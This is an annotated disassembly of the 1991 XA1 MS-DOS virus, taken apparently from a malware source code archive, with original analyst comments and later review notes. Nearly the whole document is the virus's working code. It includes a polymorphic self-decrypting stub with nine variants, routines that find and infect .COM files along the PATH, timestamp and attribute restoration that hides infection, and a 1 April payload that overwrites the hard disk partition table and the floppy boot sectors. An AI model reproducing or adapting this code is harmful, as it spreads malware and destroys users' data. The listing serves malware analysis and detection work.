MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.xa1.lst

;==============================================
; Virus XA1 isolated in Poland in June 1991
;
; disassembled by Andrzej Kadlof July 1991
;
; (C) Polish Section of Virus Information Bank
;==============================================
;-----------------------------------------------------------------------
; virus entry point (offset 0100h of an infected .COM image)
;
; 0100-0134 is the part of the virus that is stored in the clear. The
; loop at 0126-0134 transforms, in place, the 05CEh bytes that start at
; 0135 before execution falls through to 0136.
; NOTE(review): the original annotations call this start-up loop the
; "encrypt" routine and the write-out loop at 045F the "decrypt"
; routine; functionally this loop restores the body in memory.
;
; Bytes that differ between copies (patched at 03F4 and 0420-042E):
; 011F, 0124, 012C-012D and 0130. A byte pattern built over this stub
; needs wildcards at those offsets; 0100-0106 is constant.
;-----------------------------------------------------------------------
0100 EB07 jmp 0109
0102 56 0A 03 59 00 ; bytes 0100-0106 (7 bytes) form the virus signature, compared at 0328
0107 2A 00 ; generation counter: incremented at 03DB, never read in this listing
; prepare stack for tricks
; stack usage:
; [BP + 2] pushed CS, overwritten with 0100h at 0113
;          NOTE(review): the stack looks balanced up to 02AD, so this word
;          appears to be what the final RET of the relocated stub (06F0)
;          pops, i.e. the host entry point - confirm by tracing
; [BP + 0] offset in block
; [BP - 1] encryption key
; [BP - 2] low byte of the remaining byte count
0109 0E push cs ; make free space on stack
010A E80000 call 010D ; put current offset on the stack
010D FA cli ; interrupts off while words at and below SP are used as scratch
010E 8BEC mov bp,sp
0110 58 pop ax ; AX = 010D, SP now points at [bp+2]
0111 32C0 xor al,al ; AX = 0100
0113 894602 mov [bp+02],ax ; original note: corrupts debugger return address (?); see [BP + 2] above
0116 8146002800 add word ptr [bp],0028 ; 010D + 28h = 0135, first byte of the transformed block
; transform virus body; this routine is changed in different virus copies
011B B9CE05 mov cx,05CE ; length of the block (0135..0702)
011E B08C mov al,8C ; key; the immediate at 011F is rewritten for every copy (03F4)
0120 8846FF mov [bp-01],al
0123 8B5E00 mov bx,[bp] ; current position in block
; ^^ changed, possible 3 variants:
; ..5E.. mov bx,[bp] versions 0, 1, 2
; ..76.. mov si,[bp] versions 3, 4, 5
; ..7E.. mov di,[bp] versions 6, 7, 8
0126 884EFE mov [bp-02],cl ; save low byte of counter (CL is reused for the key)
0129 8A4EFF mov cl,[bp-01] ; key
012C D207 rol byte ptr [bx],cl ; byte manipulation
; ^^^^ changed, possible 9 variants:
; 000F add byte ptr [bx],cl version 0
; 300F xor byte ptr [bx],cl version 1
; D207 rol byte ptr [bx],cl version 2
; 000C add byte ptr [si],cl version 3
; 300C xor byte ptr [si],cl version 4
; D204 rol byte ptr [si],cl version 5
; 000D add byte ptr [di],cl version 6
; 300D xor byte ptr [di],cl version 7
; D205 rol byte ptr [di],cl version 8
012E EB00 jmp 0130 ; short pause
0130 43 inc bx ; position in block
; ^^ changed, possible 3 variants:
; 43 inc bx version 0, 1, 2
; 46 inc si version 3, 4, 5
; 47 inc di version 6, 7, 8
0131 8A4EFE mov cl,[bp-02] ; restore low byte of counter
0134 E2F0 loop 0126 ; the displacement byte at 0135 is itself the first byte of the block
; start of the part that is stored transformed in the file (block begins at 0135)
; This section saves machine state, hooks INT 24h, locates PATH= in the
; environment and starts the '*.COM' search in the current directory.
0136 FB sti
; get address of current DTA and store it on the stack
0137 B42F mov ah,2F
0139 CD21 int 21
013B 06 push es
013C 53 push bx
; get keyboard status bits
013D 33C0 xor ax,ax
013F 8ED8 mov ds,ax
0141 A01704 mov al,[0417] ; 0000:0417, BIOS keyboard flags
0144 2410 and al,10 ; extract scroll lock state
0146 50 push ax ; store, restored at 0266
0147 80261704EF and byte ptr [0417],EF ; clear scroll lock flag
; restore DS
014C 8CC8 mov ax,cs
014E 8ED8 mov ds,ax
; intercept INT 24h (critical error) with the handler at 06C6
0150 BAC606 mov dx,06C6
0153 B82425 mov ax,2524 ; set interrupt vector
0156 CD21 int 21
; search for PATH= in environment block
0158 A12C00 mov ax,[002C] ; segment of environment block (PSP:002C)
015B 8EC0 mov es,ax
015D 33FF xor di,di ; begin of environment block
015F FC cld
0160 26803D00 cmp es:byte ptr [di],00 ; end of block marker
0164 741D je 0183 ; end of block, ES:DI points at a zero byte
0166 BE1B05 mov si,051B ; offset of string 'PATH='
0169 B90500 mov cx,0005 ; length of string
016C 8BC7 mov ax,di ; starting address
016E F3A6 rep cmpsb ; compare
0170 7411 je 0183 ; found, ES:DI points just past 'PATH='
0172 8BF8 mov di,ax ; last starting point
0174 32C0 xor al,al
0176 B5FF mov ch,FF ; maximum block size
0178 F2AE repnz scasb ; skip to the end of this environment string
017A 74E4 je 0160
; no terminator found: fall back to an empty path list
017C BF1A05 mov di,051A ; 051A is the zero byte that ends '*.COM', so the test at 01C0 sees "end of block"
017F 8CC8 mov ax,cs ; restore ES
0181 8EC0 mov es,ax
0183 C706C1056205 mov word ptr [05C1],0562 ; file name goes at the start of the buffer (no directory prefix)
; set local DTA
0189 BA3605 mov dx,0536
018C B41A mov ah,1A ; set DTA
018E CD21 int 21
; copy the values recorded at infection time (0373, 0384) to the words used at 0288-02A9
0190 A1F906 mov ax,[06F9]
0193 A3F706 mov [06F7],ax
0196 A1FD06 mov ax,[06FD]
0199 A3FB06 mov [06FB],ax
019C B90500 mov cx,0005 ; counter of potential victims, decremented at 0493 after each infection
019F BA1505 mov dx,0515 ; '*.COM', 0
01A2 06 push es
01A3 57 push di
01A4 51 push cx
01A5 8CC8 mov ax,cs
01A7 8EC0 mov es,ax
01A9 B9FFFF mov cx,FFFF ; all possible attributes
01AC B44E mov ah,4E ; find first
01AE EB06 jmp 01B6
; re-entry point after each candidate file (jumped to from the infection routine)
01B0 59 pop cx ; restore counter
01B1 E35B jcxz 020E ; limit reached, check show/destruction
01B3 B44F mov ah,4F ; find next
01B5 51 push cx ; store counter
01B6 CD21 int 21
01B8 7203 jb 01BD ; carry set: no (more) files here, continue with the next PATH entry
01BA E9F100 jmp 02AE ; file found, go to the infection routine
; take the next directory from the PATH list and build '<dir>\*.COM'
; restore address of path in environment block
01BD 59 pop cx
01BE 5F pop di
01BF 07 pop es
01C0 26803D00 cmp es:byte ptr [di],00 ; end of block?
01C4 744A je 0210 ; yes, no directories left
; copy path to buffer
01C6 BB6205 mov bx,0562 ; offset of buffer
01C9 268A05 mov al,es:[di] ; next character
01CC 0AC0 or al,al ; end of block?
01CE 740A je 01DA ; yes
01D0 47 inc di
01D1 3C3B cmp al,3B ; ';', end of path?
01D3 7405 je 01DA ; yes
01D5 8807 mov [bx],al ; copy character
01D7 43 inc bx ; increase pointer
01D8 EBEF jmp 01C9 ; get next character
01DA 81FB6205 cmp bx,0562 ; buffer not empty?
01DE 74E0 je 01C0 ; empty entry, try the next one
01E0 8A47FF mov al,[bx-01] ; last character copied
01E3 3C3A cmp al,3A ; ':', drive only (e.g. 'C:'), no separator needed
01E5 7408 je 01EF ; yes
01E7 3C5C cmp al,5C ; check last character, '\'
01E9 7404 je 01EF ; already ends with '\'
01EB C6075C mov byte ptr [bx],5C ; add '\'
01EE 43 inc bx ; pointer past the last character
01EF 06 push es
01F0 57 push di
01F1 51 push cx
01F2 891EC105 mov [05C1],bx ; file names found later are appended here (02B1)
01F6 8BF3 mov si,bx
01F8 81EB6205 sub bx,0562 ; find path length
01FC 8BCB mov cx,bx
01FE BF1405 mov di,0514 ; last byte of the buffer that sits directly before '*.COM' (0515)
0201 8CC8 mov ax,cs ; restore ES
0203 8EC0 mov es,ax
0205 4E dec si
0206 FD std ; copy backwards so the directory ends right before '*.COM'
0207 F3A4 rep movsb ; copy
0209 8BD7 mov dx,di
020B 42 inc dx ; DX = start of '<dir>\*.COM'
020C EB97 jmp 01A5 ; find first
; end of infection process, check condition for destruction/show
; Trigger summary (from the compares below):
;   1 April                -> disk overwrite at 021E
;   24 December or later   -> Christmas tree display (05D7)
; Both are evaluated on every run of an infected program, after the
; file search has finished.
020E 58 pop ax ; balance stack
020F 58 pop ax
0210 8CC8 mov ax,cs ; restore ES
0212 8EC0 mov es,ax
; get date
0214 B42A mov ah,2A ; get date (DH = month, DL = day)
0216 CD21 int 21
0218 81FA0104 cmp dx,0401 ; April 1?
021C 7533 jne 0251 ; no
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><>
;
; DESTRUCTION OF HARD DISK AND FLOPPIES IN A: AND B:
;
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><>
; copy partition table to sector 11h of side 0, track 0
; (recovery note: the original sector 1 of the first hard disk is
; written to sector 11h before sector 1 is overwritten)
021E BA8000 mov dx,0080 ; first hard drive
0221 B90100 mov cx,0001 ; track 0 sector 1 (partition table)
0224 BB0307 mov bx,0703 ; read buffer at 0703, overwrites the victim code held there
0227 B80102 mov ax,0201 ; read 1 sector
022A 52 push dx
022B 51 push cx
022C 53 push bx
022D CD13 int 13 ; disk I/O
022F 5B pop bx
0230 59 pop cx
0231 5A pop dx
0232 B111 mov cl,11 ; new place for partition table
0234 B80103 mov ax,0301 ; write partition table
0237 CD13 int 13
; set end of sector marker in the buffer
0239 C706350855AA mov word ptr [0835],AA55 ; 0637 + 1FEh: last word of the sector image that starts at 0637
; overwrite partition table
023F B280 mov dl,80
0241 E87404 call 06B8 ; write one sector to disk
; overwrite boot sector of drive A:
0244 32D2 xor dl,dl
0246 E86F04 call 06B8 ; write one sector to disk
; overwrite boot sector of drive B:
0249 B201 mov dl,01
024B E86A04 call 06B8 ; write disk
024E EB0A jmp 025A
0250 90 nop
; compare date
0251 81FA180C cmp dx,0C18 ; december 24?
0255 7203 jb 025A ; date earlier; 24 December and every later date in the year fall through
;<><><><<><><><><><><><><><><><><><><><>
;
; CHRISTMAS SHOW
;
; see the description of subroutine 05D7
;<><><><><><><><><><><><><><><><><><><><><>
0257 E87D03 call 05D7 ; draw christmas tree
; make sound
; port 40h is read as a pseudo-random value; only when it is F8h or
; above are bits 0-1 of port 61h set (speaker enabled and left on)
025A E440 in al,40
025C 3CF8 cmp al,F8
025E 7206 jb 0266
0260 E461 in al,61
0262 0C03 or al,03
0264 E661 out 61,al
; restore the state of scroll lock flag
0266 33C0 xor ax,ax
0268 8ED8 mov ds,ax
026A 58 pop ax ; value pushed at 0146
026B 08061704 or [0417],al
; restore INT 24h
026F 2E8E1E1400 mov ds,cs:[0014] ; segment of INT 24h in PSP
0274 2E8B161200 mov dx,cs:[0012] ; offset of INT 24h in PSP
0279 B82425 mov ax,2524 ; set interrupt vector
027C CD21 int 21
; restore DTA
027E 5A pop dx
027F 1F pop ds
0280 B41A mov ah,1A ; set DTA
0282 CD21 int 21
; restore DS
0284 8CC8 mov ax,cs
0286 8ED8 mov ds,ax
; return to the host program:
; copy the 7-byte stub at 06F0 to [06F7]+[06FB] and "return" into it;
; the stub then moves [06FB] bytes from [06F7] back to 0100
0288 BEF006 mov si,06F0 ; stub: rep movsb / mov si,cx / mov di,cx / ret
028B 8B3EF706 mov di,[06F7]
028F 033EFB06 add di,[06FB]
0293 57 push di ; address of the copied stub, consumed by the RET at 02AD
0294 B90700 mov cx,0007
0297 FC cld
0298 F3A4 rep movsb
029A 33C0 xor ax,ax ; clear registers before handing over
029C 8BD8 mov bx,ax
029E 8BD0 mov dx,ax
02A0 8BE8 mov bp,ax
02A2 8B36F706 mov si,[06F7] ; source of the saved host bytes
02A6 BF0001 mov di,0100 ; destination: start of the .COM image
02A9 8B0EFB06 mov cx,[06FB] ; number of saved host bytes
02AD C3 ret ; jumps to the copied stub
; a file matching '*.COM' was found: build its full name, skip the DOS
; system files, clear blocking attributes and open it read/write
02AE BE5405 mov si,0554 ; file name returned in the local DTA (0536 + 1Eh)
02B1 8B3EC105 mov di,[05C1] ; address of destination, just past the directory prefix
02B5 B90D00 mov cx,000D ; length of asciiz string
02B8 FC cld
02B9 F3A4 rep movsb ; copy
02BB BF2005 mov di,0520 ; 'IBMBIO.COM', 0
02BE E8FA01 call 04BB ; compare with the first 11 bytes of the name buffer (04BB compares, it does not copy)
02C1 7503 jne 02C6 ; different, keep checking
02C3 E9EAFE jmp 01B0 ; equal: skip this file, find next/destruct/show
02C6 BF2B05 mov di,052B ; 'IBMDOS.COM', 0
02C9 E8EF01 call 04BB ; compare again
02CC 7503 jne 02D1
02CE E9DFFE jmp 01B0 ; equal: skip this file, find next/destruct/show
02D1 C606610500 mov byte ptr [0561],00 ; clear the flag tested at 049E
02D6 90 nop
02D7 F6064B0507 test byte ptr [054B],07 ; attribute byte in DTA
02DC 740F je 02ED ; none of read-only/hidden/system set, open file directly
02DE BA6205 mov dx,0562 ; file name
02E1 33C9 xor cx,cx ; clear all attributes
02E3 B80143 mov ax,4301 ; set file attributes
02E6 CD21 int 21
02E8 7303 jnb 02ED ; open file
02EA E9C3FE jmp 01B0 ; find next/destruct/show
02ED BA6205 mov dx,0562
02F0 B8023D mov ax,3D02 ; open file for read/write
02F3 CD21 int 21
02F5 8BD8 mov bx,ax ; handle
02F7 7303 jnb 02FC
02F9 E9B4FE jmp 01B0 ; find next
; check file size: only files of 7 .. F7FFh bytes are accepted
02FC A15205 mov ax,[0552] ; high word of file size in DTA
02FF 0BC0 or ax,ax
0301 7403 je 0306 ; file below 64K
0303 E99001 jmp 0496 ; close file and find next
0306 A15005 mov ax,[0550] ; lower word of file size
0309 3D0700 cmp ax,0007 ; minimum file size
030C 72F5 jb 0303 ; close file and find next
030E 3D00F8 cmp ax,F800 ; maximum file size
0311 73F0 jnb 0303 ; close file and find next
; maybe already infected?
; the first 7 bytes of the file are read into the work buffer and
; compared with 0100-0106 of the running copy
0313 8B16F706 mov dx,[06F7] ; form address of buffer
0317 0316FB06 add dx,[06FB]
031B B90700 mov cx,0007 ; number of bytes
031E 52 push dx
031F 51 push cx
0320 B43F mov ah,3F ; read file
0322 CD21 int 21
0324 59 pop cx
0325 5E pop si ; SI = buffer address pushed from DX
0326 7208 jb 0330 ; read error, close and find next
; compare first 7 bytes with own code
0328 BF0001 mov di,0100 ; destination
032B FC cld
032C F3A6 rep cmpsb
032E 7503 jne 0333 ; different, file is treated as not infected
0330 E96301 jmp 0496 ; close file and find next, (infected!)
; get and store file date and time
0333 B80057 mov ax,5700 ; get file time stamp
0336 CD21 int 21
0338 72F6 jb 0330 ; close file, find next
033A 89160107 mov [0701],dx ; store date
033E 890EFF06 mov [06FF],cx ; store time
0342 C606610501 mov byte ptr [0561],01 ; set the flag tested at 049E
0347 90 nop
; check file size, if less than 603h bytes then append some garbage
; (603h is the virus length, so the file always grows to at least that size)
0348 A15005 mov ax,[0550] ; file size
034B 3D0306 cmp ax,0603
034E 7321 jnb 0371
; file length is less than 603h, add some garbage
0350 33D2 xor dx,dx
0352 33C9 xor cx,cx
0354 B80242 mov ax,4202 ; move file ptr to EOF
0357 CD21 int 21
0359 7303 jnb 035E ; no errors, continue
035B E93801 jmp 0496 ; close file and find next
035E B90306 mov cx,0603 ; number of bytes
0361 2B0E5005 sub cx,[0550] ; file size
0365 B440 mov ah,40 ; write file
0367 CD21 int 21
0369 B80306 mov ax,0603 ; new file size
036C 7303 jnb 0371
036E E92501 jmp 0496 ; close file and find next
; now file is at least 603h bytes long
0371 FEC4 inc ah ; AX + 0100h
0373 A3F906 mov [06F9],ax ; original file size + 256 (copied to [06F7] at 0190 in the next generation)
0376 A15005 mov ax,[0550] ; file size
0379 BE0306 mov si,0603 ; virus length
037C 33FF xor di,di ; DI = file offset of the chunk being copied
037E 3BC6 cmp ax,si
0380 7302 jnb 0384
0382 8BF0 mov si,ax ; shorter file: only its own length is saved
0384 8936FD06 mov [06FD],si ; number of host bytes saved (copied to [06FB] at 0190)
; copy the start of the host to the end of the file, 200h bytes at a time
0388 8BD7 mov dx,di
038A 33C9 xor cx,cx
038C B80042 mov ax,4200 ; move file ptr to offset CX:DX from BOF
038F CD21 int 21
0391 7303 jnb 0396
0393 E90001 jmp 0496 ; close file and find next
0396 8B16F706 mov dx,[06F7] ; work buffer address
039A 0316FB06 add dx,[06FB]
039E B90002 mov cx,0200
03A1 3BF1 cmp si,cx
03A3 7302 jnb 03A7
03A5 8BCE mov cx,si ; number of bytes
03A7 52 push dx
03A8 51 push cx
03A9 B43F mov ah,3F ; read file
03AB CD21 int 21
03AD 59 pop cx
03AE 5A pop dx
03AF 7303 jnb 03B4 ; continue
03B1 E9E200 jmp 0496 ; close file and find next
03B4 52 push dx
03B5 51 push cx
03B6 33D2 xor dx,dx
03B8 33C9 xor cx,cx
03BA B80242 mov ax,4202 ; move file ptr to EOF
03BD CD21 int 21
03BF 59 pop cx
03C0 5A pop dx
03C1 7303 jnb 03C6 ; continue
03C3 E9D000 jmp 0496 ; close file and find next
03C6 B440 mov ah,40 ; write file
03C8 CD21 int 21
03CA 7303 jnb 03CF
03CC E9C700 jmp 0496 ; close file and find next
03CF 81C70002 add di,0200 ; next chunk
03D3 81EE0002 sub si,0200 ; bytes left
03D7 7602 jbe 03DB ; nothing left
03D9 EBAD jmp 0388
03DB FF060701 inc word ptr [0107] ; infection counter
03DF 33D2 xor dx,dx
03E1 33C9 xor cx,cx
03E3 B80042 mov ax,4200 ; move file ptr to BOF
03E6 CD21 int 21
03E8 7303 jnb 03ED
03EA E9A900 jmp 0496 ; close file and find next
; choose a new key and one of 9 stub variants, patch the running copy
; of the stub (self-modification) and write 0100-0134 to the file.
; The variation is limited to the key byte and the three patched
; instruction positions; everything else in 0100-0134 is constant.
03ED 53 push bx ; store handle
03EE E440 in al,40 ; timer port used as a source of varying values
03F0 A807 test al,07
03F2 74FA je 03EE ; retry until the low 3 bits are non-zero
03F4 A21F01 mov [011F],al ; change key (immediate of 'mov al,..' at 011E)
; get random number from system timer count
03F7 33C0 xor ax,ax
03F9 8AF8 mov bh,al
03FB 8ED8 mov ds,ax
03FD A06C04 mov al,[046C] ; timer, low byte
0400 8CCA mov dx,cs ; restore DS
0402 8EDA mov ds,dx
; generate random number in BX in the range 0..8
0404 B103 mov cl,03
0406 F6F1 div cl ; AL <- AL/3, AH <- remainder
0408 8AEC mov ch,ah ; store remainder (0, 1 or 2)
040A 32E4 xor ah,ah ; prepare division
040C F6F1 div cl ; AL <- AL / 9, AH <- remainder
040E 8AC4 mov al,ah ; AL <- second remainder
0410 02C0 add al,al ; *2, AL in [0..4]
0412 02C4 add al,ah ; *3, AL in [0..6]
0414 02C5 add al,ch ; first remainder
0416 8AD8 mov bl,al ; BL in [0..8]
; multiply BX by 4 (table entry size)
0418 03DB add bx,bx
041A 03DB add bx,bx
041C 81C3C906 add bx,06C9 ; offset of table
; modify the start-up routine (self-modification)
0420 8A07 mov al,[bx]
0422 A22401 mov [0124],al ; 3 versions 5E/76/7E (register used as pointer)
0425 8B4701 mov ax,[bx+01]
0428 A32C01 mov [012C],ax ; 9 versions (operation and register)
042B 8A4703 mov al,[bx+03] ; 3 versions (inc bx/si/di)
042E A23001 mov [0130],al
0431 8AC5 mov al,ch ; first remainder selects the operation (add/xor/rol)
; prepare the matching inverse operation for the write-out loop
0433 BBED06 mov bx,06ED
0436 D7 xlat ; AL = [06ED + AL]: 28 (sub), 30 (xor) or D2 (ror)
0437 A26104 mov [0461],al ; patch the first byte of the instruction at 0461
; write the new start-up routine to file
043A 5B pop bx ; restore handle
043B BA0001 mov dx,0100 ; start of the virus in memory; file pointer is at BOF (03E3)
043E B93500 mov cx,0035 ; block size: 0100..0134, stored in the clear
0441 B440 mov ah,40 ; write file
0443 CD21 int 21
0445 724F jb 0496 ; close file and find next
; decryption routine (original label)
; NOTE(review): this loop reads the running body from 0135 onwards,
; applies the operation patched at 0461 and writes the result to the
; file, so functionally it produces the transformed on-disk body that
; the start-up loop at 0126 later reverses.
0447 BE3501 mov si,0135 ; start of the block
044A B9CE05 mov cx,05CE ; size of the block
044D 53 push bx ; store handle
044E 51 push cx
044F B80002 mov ax,0200 ; a full 200h bytes are transformed on every pass; the write length is limited at 046E
0452 8B1EF706 mov bx,[06F7]
0456 031EFB06 add bx,[06FB] ; work buffer address
045A 53 push bx
045B 8A0E1F01 mov cl,[011F] ; key
045F 8A2C mov ch,[si]
0461 D2CD ror ch,cl ; <-- changed (3 variants)
; ^^ changed byte, possible variants:
; 28CD sub ch,cl versions: 0, 3, 6
; 30CD xor ch,cl versions: 1, 4, 7
; D2CD ror ch,cl versions: 2, 5, 8
0463 882F mov [bx],ch
0465 43 inc bx
0466 46 inc si
0467 48 dec ax
0468 75F5 jne 045F
046A 5A pop dx ; buffer address
046B 59 pop cx ; bytes still to write
046C 5B pop bx ; handle
046D 51 push cx
046E 81F90102 cmp cx,0201
0472 7203 jb 0477
0474 B90002 mov cx,0200 ; at most 200h bytes per write
0477 B440 mov ah,40 ; write file
0479 CD21 int 21
047B 59 pop cx
047C 7218 jb 0496 ; close file and find next
047E 81E90002 sub cx,0200
0482 77C9 ja 044D ; more to write
; restore file time stamp (the file's date and time do not change with infection)
0484 8B160107 mov dx,[0701] ; file date
0488 8B0EFF06 mov cx,[06FF] ; file time
048C B80157 mov ax,5701 ; set file time stamp
048F CD21 int 21
0491 7203 jb 0496 ; close file and find next
; decrease counter on the stack
0493 59 pop cx
0494 49 dec cx
0495 51 push cx
; common exit: close the file and put back its attributes if they were changed
0496 B43E mov ah,3E ; close file
0498 CD21 int 21
049A 8A0E4B05 mov cl,[054B] ; attributes as found in the DTA
049E FE0E6105 dec byte ptr [0561] ; flag was 01 (set at 0342) -> zero; flag was 00 -> FF
04A2 7405 je 04A9
04A4 F6C107 test cl,07 ; hidden, system, read only
04A7 740F je 04B8 ; none were set, nothing to restore
04A9 80F920 cmp cl,20 ; archive
04AC 740A je 04B8 ; attribute is exactly 'archive', leave as is
04AE BA6205 mov dx,0562 ; file name
04B1 32ED xor ch,ch
04B3 B80143 mov ax,4301 ; set file attributes
04B6 CD21 int 21
04B8 E9F5FC jmp 01B0 ; find next
;----------------------------------------
; compare 11 bytes at DS:0562 (start of the file name buffer) with ES:DI
; In:  DI = name to compare with (0520 or 052B at the call sites)
; Out: ZF set when all 11 bytes are equal
; NOTE(review): the original annotation described this as a move;
; the instruction is 'rep cmpsb', so nothing is copied
04BB BE6205 mov si,0562
04BE B90B00 mov cx,000B
04C1 FC cld
04C2 F3A6 rep cmpsb
04C4 C3 ret
; buffer for path (04C5..0514)
; the directory prefix is copied backwards so that it ends at 0514,
; directly before '*.COM' at 0515 (see 01FE-0207)
; NOTE(review): the strings visible at the end of the buffer ('C:\JEZYKI',
; 'C:\PC', 'D:\U', 'C:\') are presumably remnants of directory names from
; the machine on which this sample was captured
04C5 30 31 32 33 34 35 36 37 01234567
04CD 38 39 30 31 32 33 34 35 89012345
04D5 36 37 38 39 30 31 32 33 67890123
04DD 34 35 36 37 38 39 30 31 45678901
04E5 32 33 34 35 36 37 38 39 23456789
04ED 30 31 32 33 34 35 36 37 01234567
04F5 38 39 30 31 32 33 34 35 89012345
04FD 36 37 38 43 3A 5C 4A 45 678C:\JE
0505 5A 59 4B 49 43 3A 5C 50 ZYKIC:\P
050D 43 44 3A 5C 55 43 3A 5C CD:\UC:\
; patterns for search: '*.COM',0 at 0515 and 'PATH=' at 051B
0515 2A 2E 43 4F 4D 00 50 41 *.COM PA
051D 54 48 3D TH=
; file names that are never infected (compared at 02BB-02CE):
; 'IBMBIO.COM',0 at 0520 and 'IBMDOS.COM',0 at 052B
0520 49 42 4D 42 49 IBMBI
0525 4F 2E 43 4F 4D 00 O.COM
052B 49 42 IB
052D 4D 44 4F 53 2E 43 4F 4D MDOS.COM
0535 00
; local DTA (set at 0189), filled by find first/find next
0536 03 3F 3F 3F 3F 3F 3F ;\
053D 3F 3F 43 4F 4D FF 02 00 ; | reserved
0545 00 00 00 00 00 00 ;/
054B 20 ; file attribute
054C 00 60 71 0E ; file time stamp
0550 DB 62 00 00 ; file size
0554 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 00 00 ; file name (COMMAND.COM, 0, 0)
0561 01 ; flag: cleared at 02D1, set at 0342, tested at 049E when attributes are restored
; buffer for the full name of the file being processed (directory + name)
0562 43 3A 5C C:\
0565 43 4F 4D 4D 41 4E 44 2E COMMAND.
056D 43 4F 4D 00 00 4D 00 00 COM M
0575 00 2E 43 4F 4D 00 4F 68 .COM Oh
057D 4E 6F 21 4F 68 4E 6F 21 No!OhNo!
0585 4F 68 4E 6F 21 4F 68 4E OhNo!OhN
058D 6F 21 4F 68 4E 6F 21 4F o!OhNo!O
0595 68 4E 6F 21 4F 68 4E 6F hNo!OhNo
059D 21 4F 68 4E 6F 21 4F 68 !OhNo!Oh
05A5 4E 6F 21 4F 68 4E 6F 21 No!OhNo!
05AD 4F 68 4E 6F 21 4F 68 4E OhNo!OhN
05B5 6F 21 4F 68 4E 6F 21 4F o!OhNo!O
05BD 68 4E 6F 21 hNo!
05C1 65 05 ; word 0565: where the next file name is appended inside the buffer at 0562
;---------------------------------------
; write a character CX times
; two entry points: 05C3 writes spaces, 05C5 writes the character in AL
; In:  CX = repeat count (AL = character when entered at 05C5)
05C3 B020 mov al,20
05C5 50 push ax ; keep the character across the call
05C6 E89E00 call 0667 ; write character
05C9 58 pop ax
05CA E2F9 loop 05C5
05CC C3 ret
;-------------
; next line: write CR, LF
05CD B00D mov al,0D
05CF E89500 call 0667 ; write character
05D2 B00A mov al,0A
05D4 E99000 jmp 0667 ; write character, its RET returns to our caller
;------------------------------
; draw christmas tree
;
; result will look like this (shifted left here; on screen it is
; centred on column 40 of an 80-column line, and the rule below the
; trunk is 80 characters wide):
;
;                ¡
;               ***
;              *****
;             *******
;            *********
;           ***********
;          *************
;         ***************
;        *****************
;       *******************
;      *********************
;     ***********************
;    *************************
;   ***************************
;  *****************************
;               ███
;               ███
;               ███
; ═══════════════════════════════
; Und er lebt doch noch : Der Tannenbaum !
; Frohe Weihnachten ...
;
; character codes are CP437: AD = '¡', DB = '█', CD = '═'
05D7 B92700 mov cx,0027
05DA E8E6FF call 05C3 ; write 39 spaces
05DD B0AD mov al,AD ; '¡' (tree top)
05DF E88500 call 0667 ; write character
05E2 E8E8FF call 05CD ; new line
05E5 BB0300 mov bx,0003 ; BX = stars in this row
05E8 BA2600 mov dx,0026 ; DX = leading spaces in this row
05EB 8BCA mov cx,dx
05ED E8D3FF call 05C3 ; write CX spaces
05F0 8BCB mov cx,bx
05F2 B02A mov al,2A ; '*'
05F4 E8CEFF call 05C5 ; write CX characters
05F7 E8D3FF call 05CD ; new line
05FA 4A dec dx ; one space less
05FB 83C302 add bx,0002 ; two stars more
05FE 83FB1F cmp bx,001F ; stop after the 29-star row
0601 75E8 jne 05EB
0603 BB0300 mov bx,0003 ; three trunk rows
0606 B92600 mov cx,0026
0609 E8B7FF call 05C3 ; write CX spaces
060C B90300 mov cx,0003
060F B0DB mov al,DB ; '█'
0611 E8B1FF call 05C5 ; write CX characters
0614 E8B6FF call 05CD ; next line
0617 4B dec bx
0618 75EC jne 0606
061A B95000 mov cx,0050 ; full line
061D B0CD mov al,CD ; '═'
061F E8A3FF call 05C5 ; write character CX times
0622 B91300 mov cx,0013
0625 E89BFF call 05C3 ; write CX spaces
0628 BB7406 mov bx,0674 ; string: Und er lebt doch ...
062B E82C00 call 065A ; write string, BX is left pointing at the second string (069F)
062E B91D00 mov cx,001D
0631 E88FFF call 05C3 ; write CX spaces
0634 EB24 jmp 065A ; write asciiz string pointed by BX
0636 90 nop
;------------------------------------------
; start of the 512-byte image that 06B8 writes to disk (BX = 0637)
; when executed it finds its own address, prints 'April, April ... '
; followed by a bell character, and then loops forever
; the image runs from 0637 to 0836; the word at 0835 is set to AA55 at 0239
0637 E80000 call 063A
063A 5B pop bx ; BX = address of this instruction
063B 83C30D add bx,000D ; 063A + 0Dh = 0647, the string below
063E 8CC8 mov ax,cs
0640 8ED8 mov ds,ax
0642 E81500 call 065A ; write string
0645 EBFE jmp 0645 ; hang CPU
0647 41 70 72 69 6C 2C 20 41 April, A
064F 70 72 69 6C 20 2E 2E 2E pril ...
0657 20 07 00
;-----------------------------------
; write asciiz string pointed by BX
; In:  BX = address of the string
; Out: BX = address of the byte after the terminating zero
065A 8A07 mov al,[bx] ; get character
065C 43 inc bx ; next character
065D 0AC0 or al,al ; end of string?
065F 7405 je 0666 ; yes, RET
0661 E80300 call 0667 ; write character
0664 EBF4 jmp 065A ; get next character
0666 C3 ret
;--------------------
; write character in AL via INT 10h, AH = 0Eh (teletype output), page 0
; DX, CX and BX are saved and restored
; NOTE(review): the line for address 0671 appears twice in this listing;
; the address sequence 0670/0671/0672 shows a single 'pop cx' in the code
0667 52 push dx
0668 51 push cx
0669 53 push bx
066A 32FF xor bh,bh ; display page 0
066C B40E mov ah,0E
066E CD10 int 10
0670 5B pop bx
0671 59 pop cx
0671 59 pop cx
0672 5A pop dx
0673 C3 ret
; texts for the Christmas display, two zero-terminated strings:
; 0674 'Und er lebt doch noch : Der Tannenbaum !', CR, LF, 0
; 069F 'Frohe Weihnachten ...', CR, LF, BEL, 0
0674 55 6E 64 20 65 72 20 6C Und er l
067C 65 62 74 20 64 6F 63 68 ebt doch
0684 20 6E 6F 63 68 20 3A 20 noch :
068C 44 65 72 20 54 61 6E 6E Der Tann
0694 65 6E 62 61 75 6D 20 21 enbaum !
069C 0D 0A 00 46 72 6F 68 65 Frohe
06A4 20 57 65 69 68 6E 61 63 Weihnac
06AC 68 74 65 6E 20 2E 2E 2E hten ...
06B4 0D 0A 07 00
;------------------------------------------
; write one sector to disk specified in DL
; track 0, side 0, sector 1 (CX = 0001, DH = 0)
; the data written is the 512-byte image that starts at 0637
; In:  DL = BIOS drive number (80 = first hard disk, 00 = A:, 01 = B:)
; the INT 13h status is not checked
06B8 32F6 xor dh,dh
06BA B90100 mov cx,0001
06BD BB3706 mov bx,0637
06C0 B80103 mov ax,0301
06C3 CD13 int 13
06C5 C3 ret
;==================
